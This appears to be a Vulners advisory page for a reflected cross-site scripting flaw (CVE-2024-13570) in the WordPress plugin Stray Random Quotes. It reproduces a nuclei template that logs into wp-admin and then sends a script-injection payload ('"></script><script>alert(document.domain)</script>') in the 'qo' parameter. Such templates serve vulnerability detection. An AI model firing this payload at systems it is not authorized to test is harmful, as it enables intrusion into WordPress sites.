Lucene search
K

WordPress Stray Random Quotes <= 1.9.9 - Cross-Site Scripting

🗓️ 08 Jul 2026 05:22:06Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 6 Views

Reflected cross-site scripting in WordPress Stray Random Quotes <=1.9.9 due to unsanitized output.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-13570
11 Feb 202506:10
circl
CNNVD
WordPress plugin Stray Random Quotes 安全漏洞
11 Feb 202500:00
cnnvd
CVE
CVE-2024-13570
11 Feb 202506:00
cve
Cvelist
CVE-2024-13570 Stray Random Quotes <= 1.9.9 - Reflected XSS
11 Feb 202506:00
cvelist
EUVD
EUVD-2024-51676
3 Oct 202520:07
euvd
NVD
CVE-2024-13570
11 Feb 202506:15
nvd
OSV
CVE-2024-13570
11 Feb 202506:15
osv
Patchstack
WordPress Stray Random Quotes plugin <= 1.9.9 - Reflected XSS vulnerability
11 Feb 202507:11
patchstack
Positive Technologies
PT-2025-6160
11 Feb 202500:00
ptsecurity
RedhatCVE
CVE-2024-13570
13 Feb 202511:17
redhatcve
Rows per page
id: CVE-2024-13570

info:
  name: WordPress Stray Random Quotes <= 1.9.9 - Cross-Site Scripting
  author: Sourabh-Sahu
  severity: medium
  description: |
    Stray Random Quotes WordPress plugin <= 1.9.9 contains a reflected cross-site scripting caused by a lack of sanitization and escaping of a parameter before output, letting attackers execute malicious scripts in the context of high privilege users, exploit requires attacker to craft a malicious URL.
  impact: |
    Attackers can execute malicious scripts in the context of high-privilege users, potentially leading to account compromise or data theft.
  remediation: |
    Update to the latest version of the plugin where the vulnerability is fixed.
  reference:
    - https://wpscan.com/vulnerability/26019036-f7e4-4ef5-85d4-7d5fda18823e/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-13570
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-13570
    cwe-id: CWE-79
    epss-score: 0.00564
    epss-percentile: 0.42773
    cpe: cpe:2.3:a:unalignedcode:stray_random_quotes:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: unalignedcode
    product: stray_random_quotes
  tags: cve,cve2024,wp,wordpress,wp-plugin,unalignedcode,stray-random-quotes,xss,authenticated

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(header, "wordpress_logged_in")
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=stray_manage&qo=1"></script><script>alert(document.domain)</script><script> HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - contains_all(body, "></script><script>alert(document.domain)</script><script>", "stray-quotes")
          - contains(content_type, "text/html")
          - status_code == 200
        condition: and
# digest: 4a0a00473045022100f8fe3ad3c7696c88d1587b2a2c6b5858c6048279a80f97e7f5cf74833c9b78e702200905cce889029f85c43d581e1b96e1371a60a94b69b08e40d1f5f50486d96eb9:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Feb 2026 13:27Current
7.1High risk
Vulners AI Score7.1
CVSS 3.16.1
EPSS0.00564
SSVC
6